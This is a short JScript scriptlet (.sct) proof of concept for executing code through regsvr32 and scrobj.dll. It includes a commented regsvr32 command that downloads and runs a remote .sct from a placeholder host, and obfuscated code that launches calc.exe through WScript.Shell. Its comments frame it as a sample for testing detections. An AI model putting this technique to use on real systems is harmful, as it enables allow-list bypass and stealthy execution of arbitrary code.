<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->

	<!-- .sct files when downloaded, are executed from a path like this -->
	<!-- Please Note, file extenstion does not matter -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
  	<!-- You can either execute locally, or from a url -->
	<script language="JScript">
		<![CDATA[
	    		// calc.exe should launch, this could be any arbitrary code.
      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
var _0x30d7=['Run','calc.exe'];(function(_0x390c2e,_0x5b4b64){var _0x55ad50=function(_0x1a97d0){while(--_0x1a97d0){_0x390c2e['push'](_0x390c2e['shift']());}};_0x55ad50(++_0x5b4b64);}(_0x30d7,0x1ea));var _0x2e9c=function(_0x5e360a,_0xb2b162){_0x5e360a=_0x5e360a-0x0;var _0x4e34d2=_0x30d7[_0x5e360a];return _0x4e34d2;};var r=new ActiveXObject('W'+''+'S'+''+'c'+'rip'+'t.'+'S'+'h'+''+'e'+'l'+'l')[_0x2e9c('0x0')](_0x2e9c('0x1'));	
		]]>
</script>
</registration>
</scriptlet>
